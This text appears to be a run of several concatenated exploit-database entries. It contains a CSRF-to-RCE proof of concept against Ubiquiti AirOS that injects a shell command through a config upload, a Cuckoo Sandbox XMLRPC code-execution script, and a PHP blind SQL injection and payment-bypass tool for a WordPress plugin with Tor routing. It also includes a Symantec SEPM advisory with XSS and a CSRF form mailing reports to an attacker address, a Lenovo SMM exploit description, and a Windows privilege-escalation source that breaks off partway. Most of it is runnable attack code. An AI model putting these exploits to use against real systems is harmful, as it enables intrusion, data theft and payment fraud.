iptables.1.cmd=-A FIREWALL -j ACCEPT; touch /var/tmp/csrf-to-rce.txt
...
GET /apply.cgi?testmode=&_=[redacted] HTTP/1.1
Host: 192.168.1.1
X-Requested-With: XMLHttpRequest
Referer: https://192.168.1.1/system.cgi
Cookie: ui_language=en_US; last_check=1452020493426;
AIROS_SESSIONID=e5f61a5c0a9d0690b4efd484e56b8c93
Connection: keep-alive
f. Change your IP address, but ensure continued routing to the target web
application. Incrementing the last octet is sufficient.
g. Open the configuration in an editor of your choice, navigate to the
modified line and alter it: ;touch /var/tmp/csrf-to-rce-newsrc.txt
h. Repeat step e from the new IP address. You will receive the same
response. Apply the changes using the apply.cgi file.
i. Login to the target device using SSH or telnet, navigate to /var/tmp
and type ls.
j. You'll discover both files exist.
4. Mitigation and Remediation Recommendation
At this time there is no vendor patch for this vulnerability.
The vendor was unable or unwilling to communicate an expected release
date for a proper mitigation.
5. Credit
This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.
6. Disclosure Timeline
2016.02.25 - KoreLogic sends vulnerability report and PoC to Ubiquiti.
2016.02.26 - Ubiquiti acknowledges receipt of vulnerability report.
2016.04.12 - 30 business days have elapsed since the vulnerability was
reported to Ubiquiti.
2016.04.21 - KoreLogic asks for an update on the remediation effort.
2016.04.29 - Ubiquiti replies that the patch will require
"significant changes" but does not provide an estimate
of the release time table.
2016.05.04 - 45 business days have elapsed since the vulnerability was
reported to Ubiquiti.
2016.05.12 - KoreLogic requests an update from Ubiquiti.
2016.05.23 - KoreLogic requests an update from Ubiquiti.
2016.06.23 - 80 business days have elapsed since the vulnerability was
reported to Ubiquiti.
2016.06.28 - Public disclosure.
7. Proof of Concept
########################################################################
#
# Copyright 2016 KoreLogic Inc., All Rights Reserved.
#
# This proof of concept, having been partly or wholly developed
# and/or sponsored by KoreLogic, Inc., is hereby released under
# the terms and conditions set forth in the Creative Commons
# Attribution Share-Alike 4.0 (United States) License:
#
# http://creativecommons.org/licenses/by-sa/4.0/
#
#######################################################################
This example has been performed against the AirGateway device running the
1.1.6 firmware version. In order to recreate this vulnerability on
AirFiber and mFi, the attacker should first obtain a valid copy of the
device configuration and update this proof-of-concept code.
-->
<html>
<body>
<form action="https://192.168.1.1/apply.cgi" id="airos-exploit-apply">
<input type="submit" value="Submit request" />
</form>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://192.168.1.1/system.cgi", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------761818923593135447208368355");
xhr.withCredentials = true;
var body = "-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"fwfile\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"action\"\r\n" +
"\r\n" +
"fwupload\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"update_status\"\r\n" +
"\r\n" +
"enabled\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"hostname\"\r\n" +
"\r\n" +
"airGateway\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"timezone\"\r\n" +
"\r\n" +
"GMT\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"ui_language\"\r\n" +
"\r\n" +
"en_US\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"adminname\"\r\n" +
"\r\n" +
"ubnt\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"latitude\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"longitude\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"longitude\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"cfgfile\"; filename=\"hacked.cfg\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"aaa.1.radius.acct.1.status=disabled\n" +
"wpasupplicant.status=disabled\n" +
"wpasupplicant.device.1.status=disabled\n" +
"wireless.status=enabled\n" +
"wireless.1.wds.status=disabled\n" +
"wireless.1.wds.6.peer=\n" +
"wireless.1.wds.5.peer=\n" +
"wireless.1.wds.4.peer=\n" +
"wireless.1.wds.3.peer=\n" +
"wireless.1.wds.2.peer=\n" +
"wireless.1.wds.1.peer=\n" +
"wireless.1.status=enabled\n" +
"wireless.1.ssid=www.ubnt.com\n" +
"wireless.1.security.type=none\n" +
"wireless.1.scan_list.status=disabled\n" +
"wireless.1.mac_acl.policy=allow\n" +
"wireless.1.mac_acl.status=disabled\n" +
"wireless.1.hide_ssid=disabled\n" +
"wireless.1.devname=ath0\n" +
"wireless.1.autowds=disabled\n" +
"wireless.1.authmode=1\n" +
"wireless.1.ap=\n" +
"wireless.1.addmtikie=enabled\n" +
"vlan.status=disabled\n" +
"users.status=enabled\n" +
"users.1.status=enabled\n" +
"users.1.password=VvpvCwhccFv6Q\n" +
"users.1.name=ubnt\n" +
"upnpd.devname=\n" +
"upnpd.status=disabled\n" +
"tshaper.status=disabled\n" +
"telnetd.status=enabled\n" +
"telnetd.port=23\n" +
"system.modules.blacklist.status=disabled\n" +
"system.eirp.status=disabled\n" +
"system.cfg.version=65542\n" +
"syslog.status=disabled\n" +
"syslog.remote.status=\n" +
"sshd.status=enabled\n" +
"sshd.port=22\n" +
"sshd.auth.passwd=enabled\n" +
"snmp.status=disabled\n" +
"route.1.devname=eth0\n" +
"route.1.status=disabled\n" +
"route.1.comment=\n" +
"route.1.gateway=0.0.0.0\n" +
"route.1.netmask=0\n" +
"route.1.ip=0.0.0.0\n" +
"route.status=enabled\n" +
"resolv.nameserver.2.status=enabled\n" +
"resolv.nameserver.2.ip=\n" +
"resolv.nameserver.1.status=enabled\n" +
"resolv.nameserver.1.ip=\n" +
"resolv.status=disabled\n" +
"radio.status=enabled\n" +
"radio.countrycode=840\n" +
"radio.1.txpower=18\n" +
"radio.1.subsystemid=0xe4c2\n" +
"radio.1.status=enabled\n" +
"radio.1.reg_obey=disabled\n" +
"radio.1.rate.mcs=7\n" +
"radio.1.rate.auto=enabled\n" +
"radio.1.obey=disabled\n" +
"radio.1.mode=master\n" +
"radio.1.mcastrate=\n" +
"radio.1.low_txpower_mode=disabled\n" +
"radio.1.ieee_mode=11nght20\n" +
"radio.1.freq=0\n" +
"radio.1.forbiasauto=1\n" +
"radio.1.dfs.status=enabled\n" +
"radio.1.devname=ath0\n" +
"radio.1.cwm.mode=0\n" +
"radio.1.cwm.enable=0\n" +
"radio.1.countrycode=840\n" +
"radio.1.clksel=1\n" +
"radio.1.chanshift=\n" +
"radio.1.chanbw=0\n" +
"radio.1.antenna.id=4\n" +
"radio.1.acktimeout=25\n" +
"radio.1.ackdistance=600\n" +
"pwdog.status=enabled\n" +
"pwdog.retry=3\n" +
"pwdog.period=300\n" +
"pwdog.host=8.8.8.8\n" +
"pwdog.delay=300\n" +
"ppp.status=disabled\n" +
"ntpclient.status=enabled\n" +
"ntpclient.1.status=enabled\n" +
"ntpclient.1.server=0.ubnt.pool.ntp.org\n" +
"netmode=soho\n" +
"netconf.5.up=enabled\n" +
"netconf.5.hwaddr.mac=\n" +
"netconf.5.hwaddr.status=disabled\n" +
"netconf.5.autoip.status=disabled\n" +
"netconf.5.role=mlan\n" +
"netconf.5.mtu=1500\n" +
"netconf.5.devname=eth0\n" +
"netconf.5.status=disabled\n" +
"netconf.4.up=enabled\n" +
"netconf.4.netmask=255.255.255.0\n" +
"netconf.4.ip=0.0.0.0\n" +
"netconf.4.hwaddr.mac=\n" +
"netconf.4.hwaddr.status=disabled\n" +
"netconf.4.autoip.status=disabled\n" +
"netconf.4.role=bridge_port\n" +
"netconf.4.mtu=1500\n" +
"netconf.4.devname=eth1\n" +
"netconf.4.status=enabled\n" +
"netconf.3.up=enabled\n" +
"netconf.3.netmask=255.255.255.0\n" +
"netconf.3.ip=192.168.1.1\n" +
"netconf.3.hwaddr.mac=\n" +
"netconf.3.hwaddr.status=disabled\n" +
"netconf.3.autoip.status=disabled\n" +
"netconf.3.role=lan\n" +
"netconf.3.mtu=1500\n" +
"netconf.3.devname=br0\n" +
"netconf.3.status=enabled\n" +
"netconf.2.up=enabled\n" +
"netconf.2.promisc=enabled\n" +
"netconf.2.netmask=255.255.255.0\n" +
"netconf.2.ip=0.0.0.0\n" +
"netconf.2.hwaddr.mac=\n" +
"netconf.2.hwaddr.status=disabled\n" +
"netconf.2.autoip.status=disabled\n" +
"netconf.2.role=bridge_port\n" +
"netconf.2.mtu=1500\n" +
"netconf.2.devname=ath0\n" +
"netconf.2.status=enabled\n" +
"netconf.1.up=enabled\n" +
"netconf.1.promisc=enabled\n" +
"netconf.1.netmask=255.255.255.0\n" +
"netconf.1.ip=0.0.0.0\n" +
"netconf.1.hwaddr.mac=\n" +
"netconf.1.hwaddr.status=disabled\n" +
"netconf.1.autoip.status=disabled\n" +
"netconf.1.role=wan\n" +
"netconf.1.mtu=1500\n" +
"netconf.1.devname=eth0\n" +
"netconf.1.status=enabled\n" +
"netconf.status=enabled\n" +
"iptables.sys.upnpd.devname=\n" +
"iptables.sys.upnpd.status=disabled\n" +
"iptables.sys.status=enabled\n" +
"iptables.sys.portfw.status=disabled\n" +
"iptables.sys.mgmt.status=disabled\n" +
"iptables.sys.masq.1.status=enabled\n" +
"iptables.sys.masq.1.devname=eth0\n" +
"iptables.sys.masq.status=enabled\n" +
"iptables.sys.fw.status=disabled\n" +
"iptables.sys.dmz.status=disabled\n" +
"iptables.1.comment=\n" +
"iptables.1.cmd=-A FIREWALL -j ACCEPT; touch /var/hacked.txt\n" +
"iptables.1.status=enabled\n" +
"iptables.status=enabled\n" +
"igmpproxy.status=enabled\n" +
"igmpproxy.upstream.devname=eth0\n" +
"igmpproxy.1.downstream.devname=br0\n" +
"httpd.status=enabled\n" +
"httpd.session.timeout=900\n" +
"httpd.port=80\n" +
"httpd.https.status=enabled\n" +
"httpd.https.port=443\n" +
"gui.wlan.advanced.status=disabled\n" +
"gui.network.advanced.status=enabled\n" +
"ebtables.sys.vlan.status=disabled\n" +
"ebtables.sys.status=enabled\n" +
"ebtables.sys.eap.status=disabled\n" +
"ebtables.sys.eap.1.status=enabled\n" +
"ebtables.sys.eap.1.devname=ath0\n" +
"ebtables.sys.arpnat.status=disabled\n" +
"ebtables.sys.arpnat.1.status=enabled\n" +
"ebtables.sys.arpnat.1.devname=ath0\n" +
"ebtables.status=enabled\n" +
"dyndns.status=disabled\n" +
"dnsmasq.status=disabled\n" +
"dnsmasq.1.status=disabled\n" +
"dnsmasq.1.devname=eth0\n" +
"discovery.status=enabled\n" +
"discovery.cdp.status=enabled\n" +
"dhcpd.1.start=192.168.1.2\n" +
"dhcpd.1.netmask=255.255.255.0\n" +
"dhcpd.1.lease_time=600\n" +
"dhcpd.1.end=192.168.1.254\n" +
"dhcpd.1.dnsproxy=enabled\n" +
"dhcpd.1.devname=br0\n" +
"dhcpd.1.dns.2.status=disabled\n" +
"dhcpd.1.dns.2.server=\n" +
"dhcpd.1.dns.1.status=disabled\n" +
"dhcpd.1.dns.1.server=\n" +
"dhcpd.1.status=enabled\n" +
"dhcpd.status=enabled\n" +
"dhcpc.1.status=enabled\n" +
"dhcpc.1.fallback_netmask=255.255.255.0\n" +
"dhcpc.1.fallback=192.168.10.1\n" +
"dhcpc.1.devname=eth0\n" +
"dhcpc.status=enabled\n" +
"bridge.1.fd=1\n" +
"bridge.1.comment=\n" +
"bridge.1.port.2.devname=eth1\n" +
"bridge.1.port.2.status=enabled\n" +
"bridge.1.port.1.devname=ath0\n" +
"bridge.1.port.1.status=enabled\n" +
"bridge.1.stp.status=disabled\n" +
"bridge.1.devname=br0\n" +
"bridge.1.status=enabled\n" +
"bridge.status=enabled\n" +
"aaa.status=disabled\n" +
"aaa.1.status=disabled\n" +
"aaa.1.radius.macacl.status=disabled\n" +
"aaa.1.radius.auth.1.status=disabled\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"cfgupload\"\r\n" +
"\r\n" +
"Upload\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"action\"\r\n" +
"\r\n" +
"cfgupload\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"systemdate\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
document.getElementById("airos-exploit-apply").submit();
</script>
</body>
</html>
<!--
The contents of this advisory are copyright(c) 2016
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
-->
# -*- coding: utf8 -*-
"""
# Exploit Title: Cuckoo Sandbox Guest XMLRPC Privileged RCE PoC
# Date: June 28th 2016
# Exploit Author: Rémi ROCHER
# Vendor Homepage: https://cuckoosandbox.org/
# Software Link: https://github.com/cuckoosandbox/cuckoo/archive/master.zip
# Version: <= 2.0.1
# Tested on: MS Windows 7, MS Windows 10 (With & without UAC)
# CVE : None
--[ NAME
Cuckoo Sandbox Guest XMLRPC Privileged RCE PoC
--[ DESCRIPTION
Cuckoo Sandbox is Free Software, basically used by researchers to analyze
(potential) malware behavior. It is also implemented industrially by
private companies for detecting potential threats within IT Networks
featuring dedicated so-called security appliances.
This basic Proof of Concept exploit is spawning a calc.exe process with
Administrator privileges, assuming:
* The Cuckoo agent.py is running with Admin privileges (should be
the case)
* The current user can access a local interface (should be the case)
* Optional for true Remote Code Execution: External equipment can
access the XMLRPC port (default 8000).
One may also call the complete() method in order to stop any further
detection or screenshot.
Such vulnerabilities can be used to either trick the very detection
system, or potentially escape the sandbox machine itself. An attacker
could also exploit such bugs as a pivot in order to attack sensitive
systems.
--[ AUTHORS
* Rémi ROCHER - Armature Technologies
* Thomas MARTHÉLY- Armature Technologies
--[ RESOURCE
* Repository: https://github.com/cuckoosandbox/cuckoo
"""
import xmlrpclib
from StringIO import StringIO
from zipfile import ZipFile, ZipInfo, ZIP_STORED, ZIP_DEFLATED

def execute(x, cmd="cmd /c start"):
    # Build an in-memory zip containing an analyzer.py that runs cmd
    output = StringIO()
    file = ZipFile(output, "w", ZIP_STORED)
    info = ZipInfo("analyzer.py")
    info.compress_type = ZIP_DEFLATED
    content = ("""
import subprocess
if __name__ == "__main__":
    subprocess.Popen("%s",stdout=subprocess.PIPE,stderr=subprocess.PIPE)
""" % cmd)
    file.writestr(info, content)
    file.close()
    # Hand the archive to the guest agent over XMLRPC and ask it to run it
    data = xmlrpclib.Binary(output.getvalue())
    if x.add_analyzer(data):
        return x.execute()

if __name__ == "__main__":
    x = xmlrpclib.ServerProxy("http://localhost:8000")
    execute(x, "calc.exe")
    # x.complete() # Blackout mode
<?php
/**
* Exploit Title: Ultimate Membership Pro WordPress Plugin Exploit
* Google Dorks: inurl:"lid=0" OR inurl:"lid=1" ... inurl:"lid=100" "Register" "Confirm Password"
* Exploit Author: wp0Day.com <contact@wp0day.com>
* Vendor Homepage: http://wpindeed.com/
* Software Link: http://codecanyon.net/item/ultimate-membership-pro-wordpress-plugin/12159253
* Version: 3.3
* Tested on: Debian 8, PHP 5.6.17-3
* Type: Unauthenticated Blind SQLi, Unauthenticated Payment Bypass
* Time line: Found [07-Jun-2016], Vendor notified [08-Jun-2016], Vendor fixed: [Yes], [RD:1466846149]
*/
require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();
$options = getopt("t:m:l:e:s:",array('tor:'));
print_r($options);
$options = validateInput($options);
if (!$options){
showHelp();
}
if ($options['tor'] === true)
{
echo " ### USING TOR ###\n";
echo "Setting TOR Proxy...\n";
$curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
$curl->addOption(CURLOPT_PROXYTYPE,7);
echo "Checking IPv4 Address\n";
$curl->get('https://dynamicdns.park-your-domain.com/getip');
echo "Got IP : ".$curl->getResponse()."\n";
echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
$answer = fgets(fopen ("php://stdin","r"));
if(trim($answer) != 'wololo'){
die("Aborting!\n");
}
echo "OK...\n";
}
function isTrue($sql){
global $curl, $options;
$levels = "') union all select (SELECT CASE WHEN ($sql) then 1 else 1*(select table_name from information_schema.tables) end)#";
$data = array(
'action'=>'ihc_preview_user_listing',
'shortcode'=>'[ihc-list-users filter_by_level="1" levels_in="'.$levels.'" theme="ihc-theme_1" ]'
);
$curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
$resp = $curl->getResponse();
return preg_match('~ihc_public_list_users_(\d+)~',$resp);
}
function exploit(){
global $curl, $options;
if ($options['m'] == 'pay'){
$level = $options['l'];
for($i=$options['s']; $i<$options['e']; $i++){
//This is mental, no IP or Hash check!
echo "Paying Level $level to UserID: $i\n";
$data = array('x_MD5_Hash'=>'1', 'x_response_code'=>'1', 'x_cust_id'=>$i, 'x_po_num'=>$level);
$curl->post($options['t'].'wp-content/plugins/indeed-membership-pro/authorize_response.php', $data);
//echo $curl->getResponse();
}
}
if ($options['m'] == 'sql'){
$query = $options['s'];
echo "'Running' SQL Query: $query\n";
echo "Getting Length";
$max_length = 100;
//Well, it is messed up, can use , (comma) in the query
//Binary search or divide et impera is possible with the BETWEEN operator
//Code it yourself :)
$len = 0;
for ($i=1;$i<$max_length;$i++){
$sql_len = "(select char_length( ($query) ) = $i )";
if (isTrue($sql_len)){
echo "\nLength found: $i\n";
$len = $i;
break;
} else {
echo ".";
}
}
if ($len !== 0 ){
echo "Reading char by char\nResponse:\n";
} else {
die("Failed getting length!\nAborting.\n\n");
}
$charset = 'etaoinsrhdluc@*1234567890.mfywgpbvkxqjzETAOINSRHDLUCMFYWGPBVKXQJZ';
for ($i=1;$i<$len;$i++){
$got = false;
for ($j=0;$j<strlen($charset);$j++){
$chr = $charset[$j];
$question = "SELECT substr(($query) FROM $i FOR 1) = '$chr' ";
if (isTrue($question)){
echo $charset[$j];
$got = true;
break;
}
}
if (!$got){
echo "?";
}
}
echo "\n\n";
}
}
exploit();
function validateInput($options){
if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
return false;
}
if (!isset($options['m']) || !in_array($options['m'], array('sql', 'pay') ) ){
return false;
}
if ($options['m'] == 'sql' && !isset($options['s'])) {
return false;
}
if ($options['m'] == 'pay' && ( !isset($options['s']) || !isset($options['e']) || !isset($options['l']))) {
return false;
}
if ($options['m'] == 'pay' && ( !is_numeric($options['s']) || !is_numeric($options['e']) || !is_numeric($options['l']) )) {
echo "In pay mode -s -e and -l must be numeric!\n";
return false;
}
$options['tor'] = isset($options['tor']);
return $options;
}
function showHelp(){
global $argv;
$help = <<<EOD
Ultimate Membership Pro 8.4.1.3 WordPress Plugin Exploit
Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -m [MODE] -s [QUERY] -s [START] -e [END] -l [LEVEL]
[MODE] sql - Blind SQL Inject mode*
pay - Payment bypass. Parameters -l Level ID (&lid=XX in the url), -s Start UserID, -e End UserID
*Note: You can't use , (comma) in the query.
Examples:
php $argv[0] -t http://localhost/ --tor=yes -m sql -s 'select user()'
php $argv[0] -t http://localhost/ --tor=yes -m pay -s 0 -e 1000 -l 1
Marks all users with UserID between 0 and 1000 as paying customer for level ID 1
Misc:
CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
@link http://github.com/svyatov/CurlWrapper
@license http://www.opensource.org/licenses/mit-license.html MIT License
EOD;
echo $help."\n\n";
die();
}
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/SYMANTEC-SEPM-MULTIPLE-VULNS.txt
[+] ISR: ApparitionSec
Vendor:
================
www.symantec.com
Product:
===========
SEPM
Symantec Endpoint Protection Manager and client v12.1
SEPM provides a centrally managed solution. It handles security policy
enforcement, host integrity checking (Symantec Network Access Control only),
and automated remediation over all clients. The policies functionality is
the heart of the Symantec software. Clients connect to the server to get the
latest policies, security settings, and software updates.
Vulnerability Type(s):
======================
Multiple Cross Site Scripting (XSS)
Cross Site Request Forgeries (CSRF)
Open Redirect
CVE Reference(s):
=================
CVE-2016-3652 / XSS
CVE-2016-3653 / CSRF
CVE-2016-5304 / Open Redirect
Vulnerability Details:
=====================
The management console for SEPM contains a number of security
vulnerabilities that could be used by a lower-privileged user or by
an unauthorized user to elevate privilege or gain access to unauthorized
information on the management server. Exploiting these vulnerabilities
requires access to the SEP Management console.
References:
============
https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160628_01
Exploit code(s):
===============
In this case XSS can bypass the "http-only" cookie protection because the
SEPM application writes and stores the session ID within various
javascript functions used by the application within the DOM thereby
exposing them directly to the XSS attack.
1) createModalDialogFromURL
2) createWindowFromURL
3) createWindowFromForm
4) createIEWindowFromForm
So all we need to do is pass any one of those functions to alert(), e.g.
alert(createModalDialogFromURL), and it will leak the session ID, essentially
throwing the HttpOnly cookie protection flag into the garbage.
e.g.
XSS POC Defeat http-only flag and access PHPSESSID:
https://localhost:8445/Reporting/Admin/notificationpopup.php?New=1&Type=CR&height=alert%28createModalDialogFromURL%29#
Open Redirect in external URL .php script:
=========================================
A reporting URL used to route generated reports externally to any
authorized URL is susceptible to an open redirect vulnerability
that could have allowed an authorized but less-privileged user to redirect
an unsuspecting privileged user to an external URL to
attempt further exploitation, e.g. phishing.
If a victim clicks on a link supplied by an attacker
e.g.
https://localhost:8445/Reporting/common/externalurl.php?url=http://hyp3rlinx.altervista.org
Cross Site Request Forgery (CSRF):
==================================
Multiple Cross Site Request Forgery vulnerabilities exist in a couple of places
within this version of SEPM. Below is an example of sending a scheduled report to
a remote attacker's email address if the currently logged-in user visits a malicious
webpage or clicks an infected link.
Symantec Reporting Admin CSRF POC:
<form id="PWN" action="https://localhost:8445/Reporting/Reports/sr-save.php"
method="POST">
<input type="hidden" name="ReportName" value="HELL" />
<input type="hidden" name="Description" value="PWNED!" />
<input type="hidden" name="DisableReportSchedule" value="on" />
<input type="hidden" name="NewReport" value="Y" />
<input type="hidden" name="reporttype" value="1" />
<input type="hidden" name="FILTERNAME" value="Default" />
<input type="hidden" name="runEvery" value="1" />
<input type="hidden" name="repeat" value="weekly" />
<input type="hidden" name="datesched1" value="02%2F10%2F2016" />
<input type="hidden" name="datesched2" value="02%2F10%2F2016" />
<input type="hidden" name="filHourSchedule" value="16" />
<input type="hidden" name="Schedulehour" value="16" />
<input type="hidden" name="filMinSchedule" value="56" />
<input type="hidden" name="Scheduleminute" value="56" />
<input type="hidden" name="sysadmin" value="off" />
<input type="hidden" name="sendto" value="evil@abyss.com" />
<input type="hidden" name="updatelastrun" value="0" />
<input type="hidden" name="HISTORYCONFIG_IDX" value="" />
<input type="hidden" name="ReportPrefix" value="Y" />
<input type="hidden" name="report_idx" value="Y-0" />
<script>document.getElementById('PWN').submit()</script>
</form>
Disclosure Timeline:
============================================
Vendor Notification: February 11, 2016
Vendor Acknowledges Report: February 12, 2016
Vendor Releases Fix: June 28, 2016
Public Disclosure: June 29, 2016
Exploitation Technique:
=======================
Remote
Severity Level(s):
====================
Cross Site Scripting: Medium
CVSS v2 6.8  AV:A/AC:M/Au:S/C:C/I:C/A:N
CVSS v3 6.7  AV:A/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
Cross Site Request Forgery: High
CVSS v2 7.0  AV:A/AC:M/Au:M/C:C/I:C/A:C
CVSS v3 7.1  AV:A/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
Open Redirect: Medium
CVSS v2 4.1  AV:A/AC:L/Au:S/C:P/I:P/A:N
CVSS v3 4.1  AV:A/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
Source: https://github.com/Cr4sh/ThinkPwn
Lenovo ThinkPad System Management Mode arbitrary code execution exploit
***************************************************************************
For more information about this project please read the following article:
http://blog.cr4.sh/2016/06/exploring-and-exploiting-lenovo.html
This code exploits a 0-day privilege escalation vulnerability (or backdoor?) in the SystemSmmRuntimeRt UEFI driver (GUID is 7C79AC8C-5E6C-4E3D-BA6F-C260EE7C172E) of Lenovo firmware. The vulnerability is present in all of the ThinkPad series laptops; the oldest one that I have checked is the X220 and the newest one is the T450s (with the latest firmware versions available at this moment). Running arbitrary System Management Mode code allows an attacker to disable flash write protection and infect platform firmware, disable Secure Boot, bypass Virtual Secure Mode (Credential Guard, etc.) on Windows 10 Enterprise and do other evil things.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40040.zip
/*
# Exploit Title: Elevation of privilege on Windows 7 SP1 x86
# Date: 28/06-2016
# Exploit Author: @blomster81
# Vendor Homepage: www.microsoft.com
# Version: Windows 7 SP1 x86
# Tested on: Windows 7 SP1 x86
# CVE : 2016-0400
MS16-014 EoP PoC created from
https://github.com/Rootkitsmm/cve-2016-0040/blob/master/poc.cc
Spawns CMD.exe with SYSTEM rights.
Overwrites HaliSystemQueryInformation, but does not replace it, so BSOD will occur at some point
********* EDB Note *********
ntos.h is available here: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40039.zip
***************************
*/
#include "stdafx.h"
#include <Windows.h>
#include <winioctl.h>
#include "ntos.h"
#include <TlHelp32.h>
typedef union {
HANDLE Handle;
ULONG64 Handle64;
ULONG32 Handle32;
}
HANDLE3264, *PHANDLE3264;
typedef struct {
ULONG HandleCount;
ULONG Action;
HANDLE /* PUSER_THREAD_START_ROUTINE */ UserModeCallback;
HANDLE3264 UserModeProcess;
HANDLE3264 Handles[20];
}
WMIRECEIVENOTIFICATION, *PWMIRECEIVENOTIFICATION;
#define RECEIVE_ACTION_CREATE_THREAD 2 // Mark guid objects as requiring
typedef struct {
IN VOID * ObjectAttributes;
IN ACCESS_MASK DesiredAccess;
OUT HANDLE3264 Handle;
}
WMIOPENGUIDBLOCK, *PWMIOPENGUIDBLOCK;
typedef enum _KPROFILE_SOURCE {
ProfileTime,
ProfileAlignmentFixup,
ProfileTotalIssues,
ProfilePipelineDry,
ProfileLoadInstructions,
ProfilePipelineFrozen,
ProfileBranchInstructions,
ProfileTotalNonissues,
ProfileDcacheMisses,
ProfileIcacheMisses,
ProfileCacheMisses,
ProfileBranchMispredictions,
ProfileStoreInstructions,
ProfileFpInstructions,
ProfileIntegerInstructions,
Profile2Issue,
Profile3Issue,
Profile4Issue,
ProfileSpecialInstructions,
ProfileTotalCycles,
ProfileIcacheIssues,
ProfileDcacheAccesses,
ProfileMemoryBarrierCycles,
ProfileLoadLinkedIssues,
ProfileMaximum
} KPROFILE_SOURCE, *PKPROFILE_SOURCE;
typedef struct _DESKTOPINFO
{
/* 000 */ PVOID pvDesktopBase;
/* 008 */ PVOID pvDesktopLimit;
} DESKTOPINFO, *PDESKTOPINFO;
typedef struct _CLIENTINFO
{
/* 000 */ DWORD CI_flags;
/* 004 */ DWORD cSpins;
/* 008 */ DWORD dwExpWinVer;
/* 00c */ DWORD dwCompatFlags;
/* 010 */ DWORD dwCompatFlags2;
/* 014 */ DWORD dwTIFlags;
/* 018 */ DWORD filler1;
/* 01c */ DWORD filler2;
/* 020 */ PDESKTOPINFO pDeskInfo;
/* 028 */ ULONG_PTR ulClientDelta;
} CLIENTINFO, *PCLIENTINFO;
typedef struct _HANDLEENTRY {
PVOID phead;
ULONG_PTR pOwner;
BYTE bType;
BYTE bFlags;
WORD wUniq;
}HANDLEENTRY, *PHANDLEENTRY;
typedef struct _SERVERINFO {
DWORD dwSRVIFlags;
DWORD64 cHandleEntries;
WORD wSRVIFlags;
WORD wRIPPID;
WORD wRIPError;
}SERVERINFO, *PSERVERINFO;
typedef struct _SHAREDINFO {
PSERVERINFO psi;
PHANDLEENTRY aheList;
ULONG HeEntrySize;
ULONG_PTR pDispInfo;
ULONG_PTR ulSharedDelta;
ULONG_PTR awmControl;
ULONG_PTR DefWindowMsgs;
ULONG_PTR DefWindowSpecMsgs;
}SHAREDINFO, *PSHAREDINFO;
